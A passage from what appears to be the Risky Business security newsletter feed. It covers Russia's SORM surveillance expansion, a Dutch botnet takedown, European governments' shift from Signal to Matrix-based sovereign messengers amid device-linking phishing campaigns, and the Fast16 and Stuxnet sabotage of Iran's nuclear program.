internet service providers must collect from their customers and share with state authorities.</p><p>This data collection is part of a surveillance system used in Russia named SORM, which stands for the System for Operative Investigative Activities. SORM works through special equipment installed at local telcos that collects data on the company&apos;s traffic and uploads it to a government database where the police and intelligence services can query it for their investigations.</p><p>Over the years as networking equipment has become more powerful, SORM has been slowly updated with new collection rules that telcos must comply with or face a fine.</p><p>[<a href="https://news.risky.biz/risky-bulletin-russia-greatly-expands-sorm-surveillance-requirements/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Dutch police take down giant botnet of 17 million devices: </strong>Dutch authorities have conducted one of the largest-ever malware disruptions and took down a botnet that infected more than 17 million devices across the world.</p><p>The botnet was made up of computers, tablets, and smartphones that had been used to send out spam emails, phishing lures, and carry out DDoS attacks.</p><p>Dutch Police and the country&apos;s national cybersecurity agency seized more than 200 servers at a local provider, servers that had been used to grow and control the botnet.</p><p>[<a href="https://news.risky.biz/risky-bulletin-dutch-police-take-down-giant-botnet-of-17-million-devices/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  108. Srsly Risky Biz: Politicians to Ditch Signal for Homegrown Apps

    Thu, 21 May 2026 06:25:28 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://pushsecurity.com/"><em><u>Push Security</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/05/2026-05-21guillaume-perigois-0NRkVddA2fw-unsplash.jpg" alt="Srsly Risky Biz: Politicians to Ditch Signal for Homegrown Apps"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://pushsecurity.com/"><em><u>Push Security</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB168.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB168/&quot;&gt;Srsly Risky Biz: Politicians ditch Signal for homegrown apps&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 28:45 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Politicians ditch Signal for homegrown apps&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/05/data-src-image-2bdcb041-c24e-4e19-baed-c07d8b54c428.jpeg" class="kg-image" alt="Srsly Risky Biz: Politicians to Ditch Signal for Homegrown Apps" loading="lazy" width="2000" height="1334" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/05/data-src-image-2bdcb041-c24e-4e19-baed-c07d8b54c428.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/05/data-src-image-2bdcb041-c24e-4e19-baed-c07d8b54c428.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/05/data-src-image-2bdcb041-c24e-4e19-baed-c07d8b54c428.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/05/data-src-image-2bdcb041-c24e-4e19-baed-c07d8b54c428.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@guillaumeperigois?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Guillaume P&#xE9;rigois</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/row-of-european-union-flags-0NRkVddA2fw?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>European governments are trying to move their politicians away from encrypted messaging apps like Signal and WhatsApp and towards sovereign encrypted messaging solutions. This won&apos;t be as safe and secure as they think it will, but at least they&apos;ll have sovereign control.&#xA0;</p><p>Back in 2020, the European Commission (EC) <a href="https://interoperable-europe.ec.europa.eu/collection/open-source-observatory-osor/news/signal-messaging-service"><u>told its staff</u></a> that Signal had been &quot;selected as the recommended application for public instant messaging&quot;. The idea at the time was it would be used for communications between staff and people <em>outside</em> the Commission. There were already encrypted ways to send sensitive information internally, like encrypted internal email, but they were relatively inconvenient and clunky.</p><p>Signal is easy, and adopting it for that relatively narrow use case was a good thing. From a security point of view it was a massive step up from alternatives such as SMS or email, which are more vulnerable to interception and keep plaintext copies lying around on servers.&#xA0;</p><p>However, there has been a lot of scope creep since then as Signal&apos;s convenience as an app on personal smartphones became the universal &quot;good enough&quot; solution for basically everything. Signal, and to a lesser extent WhatsApp, has become the de facto global communications infrastructure for politicians and bureaucrats worldwide.&#xA0;&#xA0;</p><p>Despite this, the European Union&apos;s diplomatic service advice is that these chats <a href="https://www.documentcloud.org/documents/26278563-eeas-2025-10-15-confirmatory-application-gaza-iran-rejected/#document/p1"><u>should not discuss</u></a> sensitive information and should only be used for &quot;informal exchanges&quot; like arranging meetings.&#xA0;</p><p>It&apos;s great advice, but absolutely nobody will follow it. The reality is Signal <em>is</em> <a href="https://www.ftm.eu/articles/eu-signal-group-confirmed-transparency-rules"><u>used for statecraft</u></a>. In 2024, for example, French President Emmanuel Macron even used Signal to <a href="https://www.euronews.com/my-europe/2025/09/24/mercosur-deal-von-der-leyen-being-probed-for-auto-deleting-macrons-text"><u>raise concerns about a trade deal</u></a> with EC President Ursula von der Leyden.&#xA0;</p><p>Of course, this isn&apos;t just a European phenomenon. In the US, senior members of the Trump administration <a href="https://news.risky.biz/bonjour-fellow-it-workers/#signalgate-is-a-massive-security-failure"><u>were using Signal like crazy</u></a> and accidentally invited a reporter into<a href="https://news.risky.biz/the-signalgate-messages-have-been-released-and-oh-my-god/"><u> a group chat that was discussing imminent war plans</u></a>. Outside of the administration, large Signal group chats <a href="https://www.semafor.com/article/04/27/2025/the-group-chats-that-changed-america"><u>have been described</u></a> as &quot;a kind of dark matter of American politics and media&quot;. <a href="https://www.theguardian.com/uk-news/2025/dec/11/uk-mps-facing-rising-number-of-phishing-attacks"><u>UK parliamentarians</u></a> and <a href="https://www.theguardian.com/politics/2019/dec/17/tories-switch-to-messaging-app-signal-to-curb-whatsapp-leaks"><u>political parties</u></a> also use Signal and WhatsApp.&#xA0;</p><p>High-level discussions being held on Signal <a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger"><u>inevitably attracts state-backed hackers</u></a>, and they&apos;ve come up with clever ways to phish users and spy on accounts. These phishing campaigns take advantage of Signal&apos;s linked devices feature which allows the app to be used concurrently on multiple devices. In these attacks, the attacker convinces the victim to link an attacker-controlled device by modifying a device-linking request so that it looks like some other legitimate Signal resource. This could involve making a device-linking request look like a <a href="https://support.signal.org/hc/en-us/articles/360051086971-Group-Link-or-QR-code"><u>group invite</u></a> QR code, for example. When these attacks are successful, the attacker is able to link a device they control to the victim&apos;s account and from then on get persistent access to the victim&apos;s Signal communications. The most prolific of these campaigns have been attributed to <a href="https://www.ic3.gov/PSA/2026/PSA260320"><u>Russian intelligence services</u></a>.</p><p>Over the last year, governments have cottoned on and <a href="https://www.bleepingcomputer.com/news/security/dutch-govt-warns-of-signal-whatsapp-account-hijacking-attacks/"><u>issued</u></a> <a href="https://www.ic3.gov/PSA/2026/PSA260320"><u>lots and lots</u></a> of <a href="https://www.ncsc.gov.uk/news/ncsc-warns-of-messaging-app-targeting"><u>warnings</u></a> <a href="https://www.cert.ssi.gouv.fr/uploads/20260320_NP_C4_Alerte_Ciblage_messagerie_instantanee.pdf"><u>about</u></a> the <a href="https://www.govinfosecurity.com/germany-caught-up-in-likely-russian-signal-phishing-a-31535"><u>attacks</u></a>.</p><p>Now, European governments are seeking alternatives to Signal. Fundamentally, these phishing attacks are possible because Signal and WhatsApp do a fairly poor job of verifying who you are talking to, and anyone can sign up for an account. They&apos;re open ecosystems.&#xA0;</p><p>Signal even notes it &quot;does not verify profile names or identities&quot; and it can be hard to know if you are talking to the Secretary of Defense, <a href="https://www.theatlantic.com/politics/archive/2025/03/trump-administration-accidentally-texted-me-its-war-plans/682151/"><u>the Editor-in-Chief of <em>The Atlantic</em></u></a> or even an account controlled by Russia&apos;s FSB.&#xA0;</p><p>So now, <a href="https://interoperable-europe.ec.europa.eu/eu-oss-catalogue/solutions/bundesmessenger"><u>Germany</u></a>, <a href="https://element.io/en/case-studies/tchap"><u>France</u></a>, <a href="https://beam.belgium.be/en/"><u>Belgium</u></a> and <a href="https://www.gov.pl/web/baza-wiedzy/komunikator-mszyfr"><u>Poland</u></a> are all developing and adopting sovereign solutions built on top of the <a href="https://matrix.org"><u>open source Matrix protocol</u></a>.&#xA0;</p><p>At least in the short term, the Matrix-based systems European governments are developing are only intended to provide secure messaging <em>within</em> government. This reduces the number of potential attackers from &apos;everyone on the internet&apos;, to &apos;everyone in government&apos;, which makes the <a href="https://x.com/signalapp/status/2031038277604585785"><u>support message-style phishing attacks</u></a> that have been <a href="https://techcrunch.com/2026/05/14/a-spyware-investigator-exposed-russian-government-hackers-trying-to-hijack-signal-accounts/"><u>successful against Signal users</u></a> more difficult to pull off.&#xA0;</p><p>Helpfully, it also won&apos;t be possible for officials to inadvertently invite journalists into government group chats.&#xA0;</p><p>Matrix-based systems have another advantage in that they are federated. Governments can run their own servers and use their own identity platforms for authentication. These systems could be set up to be far more robust against phishing. They could require, for example, strong identity checks when onboarding users, phishing-resistant authentication and detecting and investigating anomalous logins. If the sovereign messengers were opened up to become more interoperable, and therefore more exposed to untrusted outsiders, these countermeasures would make them more secure against phishing. None of those controls apply to Signal. It&apos;s just, &quot;trust me bro, I <em>am</em> Signal Support ChatBot&quot;.</p><p>It&#x2019;s not just the phishing risk that&apos;s driving the European shift from Signal and WhatsApp. Just as important are European concerns about data retention and sovereignty. Relying on US-based organisations is a bit on the nose right now. Matrix-based solutions tick that box too, and governments are able to set their own <a href="https://element.io/blog/data-retention-controls-added-to-admin-console/"><u>data retention policies</u></a>.&#xA0;</p><p>Of course, this is a swings and roundabouts situation here. From a security perspective Signal is well-tested and we know where the security pitfalls are and where it is lacking. But new homegrown systems come with new, homegrown security vulnerabilities.&#xA0;</p><p>Implementing federated systems with data retention capabilities also vastly increases the attack surface as compared to Signal. Do that in an ill considered way and you end up in a worse situation than you started with. One of the Trump administration&apos;s mistakes with Signal, for example, was to use a fork for data retention that happened to be <a href="https://news.risky.biz/its-like-signal-but-dumb/"><u>horrendously insecure</u></a>.</p><p>As of right now, however, the walled-garden nature of the systems being developed by European governments limits their usefulness. Part of the appeal of Signal and WhatsApp is that they can be used to communicate with anyone. That is essential for politicians trying to build links with friends and foes. <a href="https://www.bbc.com/news/articles/cz7ynwzn8pqo"><u>It is surprising</u></a> how often <a href="https://www.atlanticcouncil.org/blogs/menasource/how-whatsapp-upended-middle-east-diplomacy-and-what-the-us-can-learn-from-it/"><u>international diplomacy</u></a> is carried <a href="https://thehill.com/homenews/administration/411971-kushner-and-saudi-prince-communicated-informally-on-whatsapp-report/"><u>out via text message</u></a>.&#xA0;</p><p>We understand the desire to more strongly protect internal government communications within vetted communities. But this is just a subset of the messages that Signal or WhatsApp are used for. In contrast to mid-level bureaucrats, the most senior politicians and officials must often communicate with frenemies. In those cases, there is no trusted community where a sovereign, government-controlled secure messenger could be used.&#xA0;</p><p>So Signal will continue to be used for that reason. So we don&apos;t think governments should shun the app, but rather encourage the Signal Foundation to engineer more robust anti-phishing protections. And if data retention is a concern, they may want to spend the money to fork Signal into something that can securely implement suitable retention policies as well as their own anti-phishing controls.&#xA0;</p><p>Obviously, some of this will go horribly wrong. Could it be the home-grown Matrix-based apps? Bad attempts at Signal forks? Design-by-committee data retention architectures? Place your bets!</p><h2 id="the-slow-burn-of-fast16-and-stuxnet">The Slow Burn of Fast16 and Stuxnet</h2><p>In recent weeks details have come to light about the cyber operations campaign intended to slow Iran&apos;s development of nuclear weapons in the mid-to-late 2000s.</p><p>The overall campaign was intended to stop or slow Iran&apos;s nuclear weapon development program, and we&#x2019;ve recently learnt that the infamous <a href="https://en.wikipedia.org/wiki/Stuxnet#Operation"><u>Stuxnet worm</u></a> was just one arm of a two-pronged effort.&#xA0;</p><p>Stuxnet was discovered in 2010 and had been deployed in the years prior. It was malware intended to destroy centrifuges being used to enrich uranium at the <a href="https://en.wikipedia.org/wiki/Natanz_nuclear_facility"><u>Natanz nuclear facility</u></a>. It did so by rapidly changing the speed of these centrifuges while making it appear to those in the control room that&#xA0; they were behaving normally.&#xA0;</p><p>The second, previously unknown element of the campaign is malware that has been dubbed Fast16. It was developed around the same time as Stuxnet, and was subsequently <a href="https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/"><u>recovered from malware archives</u></a> by SentinelOne researchers in 2019.</p><p>But it&apos;s only in the last month that subsequent analysis from SentinelOne <a href="https://www.security.com/threat-intelligence/fast16-nuclear-sabotage?ref=zetter-zeroday.com"><u>and Symantec</u></a> indicated the malware had a <em>very specific</em> purpose. It was <em>also</em> designed to frustrate Iran&apos;s nuclear program.&#xA0;</p><p>Symantec was able to confirm that Fast16 targeted LS-DYNA and AUTODYN, two software applications that simulate real-world events such as vehicle crashes and explosions. In both applications, Fast16 would only tamper with the results of simulations of high explosive detonations.&#xA0;</p><p>The Institute for Science and International Security (ISIS) has <a href="https://isis-online.org/isis-reports/fast-16-malware-aimed-at-undermining-proliferant-state-nuclear-weapons-programs-iran-was-a-credible-target"><u>published further technical</u></a> detail that supports the hypothesis that the malware&apos;s target was Iran&apos;s nuclear program. LS-DYNA and AUTODYN were both being used in Iran at that time, and the malware would change results when simulations involved uranium being compressed in an explosion. David Albright of ISIS, <a href="https://www.zetter-zeroday.com/experts-confirm-the-fast16-malware-was-sabotaging-nuclear-weapons-tests-likely-in-iran/"><u>told <em>Zero Day&#x2019;s </em>Kim Zetter</u></a> (who, as an aside, literally wrote <a href="https://www.penguinrandomhouse.com/books/219931/countdown-to-zero-day-by-kim-zetter/"><u>the book on Stuxnet</u></a>) that the malware could have been &quot;very disruptive&quot; for Iran&apos;s nuclear program. (Another aside, Albright is obviously with the <em>other</em> <a href="https://isis-online.org/about/staff/albright/"><u>ISIS</u></a>.)</p><p>&quot;The effect would be to waste time, resources, and lower the overall morale of the program&quot;, he continued.&#xA0;</p><p>As for Stuxnet, there are claims it may have <a href="https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html?pagewanted=all"><u>destroyed a fifth</u></a> of Iran&apos;s centrifuges, although the <a href="https://isis-online.org/isis-reports/did-stuxnet-take-out-1000-centrifuges-at-the-natanz-enrichment-plant"><u>overall impact</u></a> of this on the entire Iranian nuclear program is disputed. It appears that it was a technical success, but it may only have delayed Iran&apos;s nuclear enrichment program by a year or so.&#xA0;</p><p>But now we also know Fast16 was simultaneously targeting a totally different aspect of Iran&apos;s nuclear weapons program: How to develop and test the implosion mechanism that kicks off the nuclear reaction.&#xA0;</p><p>The problem with this type of very clever operation is that it can be hard for the malware&apos;s author to know if it worked. The end result of a successful operation is... the sound of Iranian engineers tearing their hair out? Them complaining on insecure lines to their spouses about bad days at work?</p><p>Still, this was a multi-pronged campaign with a clear strategic objective: slow Iran&apos;s nuclear ambitions. By contrast, the current administration&apos;s focus is on normalising the use of cyber operations within conventional military action.&#xA0;</p><p>In recent years we&apos;ve seen cyber operations being used to <a href="https://news.risky.biz/china-fights-scam-compounds-for-china/#maduro-raid-cements-disruptive-cyber-role"><u>switch off street lights</u></a> in Venezuela, <a href="https://news.risky.biz/srsly-risky-biz-microsofts-forgoes-its-secure-future/#%5C34%2004-iranian-air-defence-not-found"><u>disrupt air defence systems</u></a> in Iran, and <a href="https://news.risky.biz/srsly-risky-biz-the-four-hour-cyber-war-on-iran/"><u>helped during the decapitation strike</u></a> at the start of the Iran war.&#xA0;</p><p>These are tactically useful, visible, but at the same time feel relatively small. For want of a better word, they&apos;re just not very <em>cool.&#xA0;</em></p><p>Our bet is that the truly impactful operations, the cool ones, are still out there but going undetected. Maybe we&apos;ll know about those ones 20 years from now, too.</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/9BbSZZXa80k?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: Politicians ditch Signal for homegrown apps"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>A New US Telco ISAC:</strong> Eight of the US&apos;s largest telcos <a href="https://about.att.com/story/2026/c2-isac.html"><u>have established</u></a> the Communications Cybersecurity Information Sharing and Analysis Center (C2ISAC). The idea is that the non-profit will &quot;strengthen cybersecurity across the communications sector&quot;. It is <a href="https://www.nationalisacs.org/about-nci"><u>the 29th ISAC</u></a>, but given the <a href="https://en.wikipedia.org/wiki/Salt_Typhoon"><u>carnage caused by Salt Typhoon</u></a> it&apos;s better late than never.&#xA0;</li><li><strong>UK to amend cybercrime laws:</strong> The British government is planning to update the country&apos;s Computer Misuse Act to allow for good-faith cyber security work. <em>The Record </em>has <a href="https://therecord.media/uk-moves-to-shield-security-researchers-cybercrime"><u>further coverage</u></a>.&#xA0;</li><li><strong>Hardening Linux:</strong> Red Hat <a href="https://www.redhat.com/en/blog/red-hat-hardened-images"><u>has announced</u></a> Red Hat Hardened Images, a catalog of minimalist container images that ship security fixes rapidly. Debian <a href="https://lists.debian.org/debian-devel-announce/2026/05/msg00001.html"><u>has also announced</u></a> that all new packages must use <a href="https://en.wikipedia.org/wiki/Reproducible_builds"><u>reproducible builds</u></a>. This means that developers will be able to verify that a binary has originated from specific source code and <a href="https://linuxsecurity.com/features/debian-reproducible-builds"><u>makes it harder</u></a> for supply-chain shenanigans to take place.&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, James Wilson chats with Push Security&#x2019;s Chief Research Officer Jacques Louw about how the company has integrated an army of AI agents into its threat detection platform. Not only has agentic AI led to the discovery of Install Fix campaigns, but it will help simplify the platform for new customers.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI128.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI128/&quot;&gt;Sponsored: Push Security goes AI threat hunting in browser telemetry&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; 